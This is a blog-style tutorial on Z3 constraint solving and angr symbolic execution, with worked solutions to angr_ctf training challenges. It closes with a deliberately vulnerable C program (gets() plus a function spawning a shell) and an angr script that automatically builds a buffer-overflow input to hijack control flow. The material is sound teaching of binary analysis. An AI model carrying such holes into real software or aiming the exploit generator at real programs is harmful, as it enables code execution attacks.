Play with Angr
Published:
I have put this note in my draft for a long time :stuck_out_tongue_winking_eye: Recently, got a chance again to play with it in research. Here is the story about playing Angr just like a baby.
Constraint solving with Z3
Before we look into Angr, we should be faimiliar with Z3 first.
x = int(argv[1])
y = iny(argv[2])
z = x + y
if(x >= 5)
y = y + z
if(y < x)
foobar(x, y, z)
else
...
The screenshot above is the online interaction platform for Z3 solver. If we want to prove the reachability of foobar()
, the general steps can be listed as:
- declare variables with
declare-const
I specify the type of variables as integer here. Imagine that you want to declare a variable of 32 bit address which has fixed width, Z3 can also provide us with bitvector types. - SSA (Static Single Assignment)
Fory = y + z
, we will assign another versiony2
in our declaration. The reason is that conflicts would happen if there are different constraints imposed onbefore-y
andafter-y
. The best way is just to imagine them as two different variables. - adding constraints
Start withassert
, put operator at the head and operands at the tail. - Check satisfiability then get the model
check-sat
can return whether constraints are satisfiable. If it returnssat
, then we can try to the model, which is one possible solution of concrete assignment value to all constants.
How to prove validity
The steps above explain the basic use of Z3 solver to get one possible solution. We can also use it to prove validity of a formula! Take the above for example, we know that there exists a solution to satisfy all constraints; however, we might also want to prove the given constraint would be true no matter the concrete value of input we give, this is the validity of formula. We can make use of unreachability to achieve this.
(assert (formula))
(check-sat)
; -> sat
(reset)
(assert (not (formula)))
(check-sat)
; -> unsat
For the example above, we know that there exist possible solutions for formula. We reset Z3’s stack for constraints. Negate the formula, if there is no any solution can make negation of formula true, it means arbitrary solutions can make formula true, then it is valid! Otherwise, if you can find the solution, the solution can be considered as counterexample.
Simplify constraints
We all know that complex constraints would cause to a burden on solver. Z3 has a functionality to simplify the constraints in some case.
Modeling constraints with Bitvectors
As a binary guy, I am more interested in symbolic execution on bit type data structure, bitvectors.
; y = x + 0x10
(declare const x (_ BitVec 32))
(declare const y (_ BitVec 32))
(assert (= y (bvadd x #x10)))
Here, I declare both x
and y
as bitvectors with 32 bit width. bvadd
is the add operation between bitvectors. We can also specify with signed(e.g., bvsadd
) or unsigned(e.g., bvuadd
).
Symbolic execution with Angr
Given the output of the sequence of operations, what must the input have been?
- The data structure which supports symbolic execution in Angr is BitVector.
- BitVector is a structure of AST which can be translated into symbolic constraints for Z3 engine.
- e.g., When
if(x > 4)
is reached, we can get constraints such as<Bool x_32_1 > 4>
. - Next question for the example above, which branch does Angr take? True or False branch?
Angr takes both branches and generates two successor states
True branch:state.solver.add(x > 4)
False branch:state.solver.add(!(x > 4))
- Constraint solving to get the input.
Here, I am interested the form of symbolic constraints with Angr. I compile a sample code which will receive user’s input to a binary,
...
cond = input[0];
if(cond == 'a') {
printf("Congrats\n");
}else {
printf("Fail\n");
}
Use sample script to list out the constraints.
import angr
p = angr.Project("./simple", auto_load_libs=False)
state = p.factory.entry_state()
simgr = p.factory.simgr(state)
while True:
print(len(state.solver.constraints))
succ = state.step()
if len(succ.successors) == 2:
break
state = succ.successors[0]
state1, state2 = succ.successors
print("For state 1")
print(state1.solver.constraints)
print("For state 2")
print(state2.solver.constraints)
Briefly introduce the script:
- import the binary
- define the entry state
- simulation manager would help to manage the state
In while
loop, I will break out when there are two successors, which are branches of if
and else
. Using solver.constraints
can help me print out the constraints for the state.
For state 1
[<Bool packet_0_stdin_3_8 == 97>]
For state 2
[<Book packet_0_stdin_3_8 != 97>]
Angr doesn’t really run up the binary, but just simulate the state.
Recommend to read through Solver Engine
Learn with Angr ctf
The challenges are from jakespringer/angr_ctf. The angr is installed and run in my Ubuntu 18 virtual machine.
The general steps can be listed as:
- Create project from the given binary
p = angr.Project([binary], auto_load_libs = False)
CLE module of Angr would load the binary.
p
represents entity of loaded binary. - Set state
ini = p.factory.entry_state()
Angr doesn’t work on binary directly, but make operations on simulation program state(SimState). It is just like a snapshot, many information are stored in attributes of state.
entry_state
tells symbex engine to start from entry point. - Create BVS(bitvector symbolic) or BVV(bitvector value)
- symbolize memory or some interesting places
- Set up Simulation Managers
sim = p.factory.simgr(ini)
It is just like the user interface for operations on state.
- Run
sim.explore(find = target_address)
One famous use is with
find
. The value offind
can be the target address(or list of) we want to run to, or a state (if matched in active stash, it would be stored in found stash). More examples can be found in exploration. - Constraint solving
// check whether state matches or not? if simulation.found: sol_state = sim.found[0] sol = sol_state.posix.dumps(sys.stdin.fileno)
We can dump the corresponding solution for the state.
sys.stdin.fileno
will return the file descriptor for standard input which is 0. Please be careful the output format ofdumps()
function is byte sequence rather than string.
03 Angr symbolic registers
In this challenge, I learn how to symbolize registers. After I put 03_angr_symbolic_registers
into ida pro,
I can find that get_user_input
receives user input with hex format, and put values into eax, ebx, and edx.
import angr
import sys
import claripy
def exp():
path = '../bin/03_angr_symbolic_registers'
p = angr.Project(path, auto_load_libs = False)
start = 0x80488D2
# blank_state: leave data uninitialized
ini_state = p.factory.blank_state(addr=start)
input0 = claripy.BVS('x', 32)
input1 = claripy.BVS('y', 32)
input2 = claripy.BVS('z', 32)
# to symbolize the registers
ini_state.regs.eax = input0
ini_state.regs.ebx = input1
ini_state.regs.edx = input2
def success(state):
if b'Good Job.\n' in state.posix.dumps(1):
return True
else:
return False
def abort(state):
if b'Try again.\n' in state.posix.dumps(1):
return True
else:
return False
sim = p.factory.simgr(ini_state)
sim.explore(find=success, avoid=abort)
if sim.found:
# state has been stored in found
for i in sim.found:
sol_state = i
sol0 = format(sol_state.solver.eval(input0), 'd')
sol1 = format(sol_state.solver.eval(input1), 'd')
sol2 = format(sol_state.solver.eval(input2), 'd')
solution = sol0 + " " + sol1 + " " + sol2
print("[+] Solution is: {}".format(solution))
else:
print("No solutions can be found!")
if __name__ == '__main__':
exp()
This is my exploit. The most interesting parts are
- blank state
Here, we use different state fromentry_state()
. You can follow the link to find more states. I specify the starting address to the place afterget_user_input()
. Usingblank_state
here would keep everything symbolic and unconstrained including registers and memory. - symbolize registers
- explore
After running exploit and get results
04 Angr symbolic stack
In last challenge, we know how to symbolize registers. In this challenge, we will know how to symbolize variable stored on the stack (local variable).
From the screenshot, we can find that [ebp+var_C]
and [ebp+var_10]
are passed to complex_function0
and complex_function1
as parameters.
... same import ...
def exp():
p = angr.Project('../bin/04_angr_symbolic_stack', auto_load_libs=False)
start = 0x80486B2
ini_state = p.factory.blank_state(addr=start)
# create a new stack frame
ini_state.regs.ebp = ini_state.regs.esp
input0 = claripy.BVS('input0', 32)
input1 = claripy.BVS('input1', 32)
# To push two BVSs onto the stack
# we need 8 bytes of space
ini_state.regs.esp -= 8
ini_state.stack_push(input0)
ini_state.stack_push(input1)
sim = p.factory.simgr(ini_state)
def success(state):
if b'Good Job.\n' in state.posix.dumps(1):
return True
else:
return False
def abort(state):
if b'Try again.\n' in state.posix.dumps(1):
return True
else:
return False
sim.explore(find=success, avoid=abort)
if sim.found:
... same ...
Here I felt a little confused. Why do I put esp’s value into ebp after I create a blank state? What does stack_push
mean in the program?
First, after we create the blank state, I plan to create a new stack frame. This is the reason why I move current esp’s value into ebp, I start the new stack frame from current esp. The blank state starts at 0x80486B2
after scanf()
; however, we need to replicate two actions at 0x80486A0
and 0x80486A4
to push our symbolic variables. This is how our stack_push
works for.
05 Angr symbolic memory
In this challenge, we will symbolize memory at the specified address.
In the screenshot above, our input are read into four consecutive addresses strarting from user_input
. Each input would take for 8 bytes which can be found in the offsets between them.
... same import ...
def exp():
p = angr.Project('../bin/05_angr_symbolic_memory', auto_load_libs=False)
start = 0x8048619
ini_state = p.factory.blank_state(addr=start)
user_input = 0x9F318E0
input0 = claripy.BVS('input0', 64)
input1 = claripy.BVS('input1', 64)
input2 = claripy.BVS('input2', 64)
input3 = claripy.BVS('input4', 64)
ini_state.memory.store(user_input, input0)
ini_state.memory.store(user_input + 0x8, input1)
ini_state.memory.store(user_input + 0x10, input2)
ini_state.memory.store(user_input + 0x18, input3)
sim = p.factory.simgr(ini_state)
... define success and abort function ...
sim.explore(find=success, avoid=abort)
if sim.found:
for i in sim.found:
sol_state = i
sol0 = sol_state.solver.eval(input0, cast_to=bytes)
sol1 = sol_state.solver.eval(input1, cast_to=bytes)
sol2 = sol_state.solver.eval(input2, cast_to=bytes)
sol3 = sol_state.solver.eval(input3, cast_to=bytes)
sol = sol0 + b" " + sol1 + b" " + sol2 + b" " + sol3
print("[+] Success! solution is: {}".format(sol.decode("utf-8")))
else:
raise Exception('Could not find any answer')
if __name__ == '__main__':
exp()
In my exploit, I still define the start address to the place after scanf
. Next task is to make symbolization. This time, user_input
is not stored in register or local variable,
but stored in .bss
section as global variable. In Angr, we can directly read memory with .load(addr, size)
or write to memory with .store(addr, data)
. To symbolize our global variable, we store our bitvectors into the global variables. Now, we are ready to solve the challenge.
06 Angr symbolic dynamic memory
There are several steps in this challenge.
The program allocates two 9 bytes buffers with malloc()
, and the addresses which point to heaps would be put into buffer0
and buffer1
respectively. At the end of this basic block, the program will read the saved address from the buffers into edx
and eax
. Two registers would be used as the addresses which receive user’s input.
At first, I am confused that how to get the address of heaps (it should be eax
value return from malloc()
). However, we don’t need the true address of heaps. Following is my exploit,
import angr
import sys
import claripy
def exp():
p = angr.Project('../bin/06_angr_symbolic_dynamic_memory', auto_load_libs=False)
start = 0x80486B3
ini_state = p.factory.blank_state(addr=start)
buffer0 = 0xB2500B4
buffer1 = 0xB2500BC
fake_heap0 = 0xB250008
fake_heap1 = 0xB250018
input0 = claripy.BVS('input0', 64)
input1 = claripy.BVS('input1', 64)
ini_state.memory.store(buffer0, fake_heap0, endness=p.arch.memory_endness)
ini_state.memory.store(buffer1, fake_heap1, endness=p.arch.memory_endness)
ini_state.memory.store(fake_heap0, input0)
ini_state.memory.store(fake_heap1, input1)
sim = p.factory.simgr(ini_state)
... same constraint solving ...
I put two fake addresses into buffer respectively. To symbolize heaps, I put two bitvectors into heaps. We don’t need to care about the choice of fake addresses because Angr wouldn’t truly allocate the memory, it just makes simulation. Then we get the solutions.
08 Angr constraints
The workflow of this challenge is similar to the previous challenges, take a look at the following picture
there is a while loop which would iterate index on our input from 0 to 15. Each character of our input would be encrypted by complex_function
, then go into the check of check_equals_IDontCareWhatItIs
. Following is the content of this check function,
arg2
is 0x10
which means that this while loop would check each characters and leads to 2^16
possible branches. This is the place where path explosion happens!
To solve this problem, we can try to simply the constraint (avoid getting into so many if conditions). If we read into the code, we can find that check function tries to compare our encrypted input with some strings stored in the data section, take a look at the following picture
The address of the check function is 0x8048580
Take away, path explosion can be caused by if conditions in while loop. One solution to solve path explosion is to add constraints, in other words, simplify constraints.
Automatic exploit Buffer Overflow
#include<stdio.h>
#include<stdlib.h>
void try_to_call_me(){ system("sh"); }
int main(){
setvbuf(stdout,0,2,0);
setvbuf(stdin,0,2,0);
setvbuf(stderr,0,2,0);
puts( "Try exploit buffer overflow" );
char buf[0x10];
gets( buf );
return 0;
}
It is easy to find vulnerability of buffer overflow in this program. We can overwrite return address of main()
with try_to_call_me()
.
import angr
from angr import sim_options as so
def fully_symbolic(state, variable):
for i in range(state.arch.bits):
if not state.solver.symbolic(variable[i]):
return False
return True
def main():
p = angr.Project("./bof", auto_load_libs=False)
extras = {so.REVERSE_MEMORY_NAME_MAP, so.TRACK_ACTION_HISTORY, so.MEMORY_SYMBOLIC_BYTES_MAP}
es = p.factory.entry_state(add_options=extras)
sm = p.factory.simulation_manager(es, save_unconstrained=True)
call_me = 0x400692
#print("Try to find vulnerability in bof\n")
exploitable_state = None
while exploitable_state is None:
#print(sm)
sm.step()
if len(sm.unconstrained) > 0:
#print("find {} unconstrained state, let's track exploitability".format(len(sm.unconstrained)))
for u in sm.unconstrained:
if fully_symbolic(u, u.regs.pc):
exploitable_state = u
break
sm.drop(stash="unconstrained")
ep = exploitable_state
ep.add_constraints(ep.regs.pc == call_me)
with open("./exploit", "wb") as f:
f.write(ep.posix.dumps(0))
#print("Put exploit into file")
if __name__ == '__main__':
main()
This exploit can be separated to two steps:
- Find exploitable state
- add constraints and constraint solving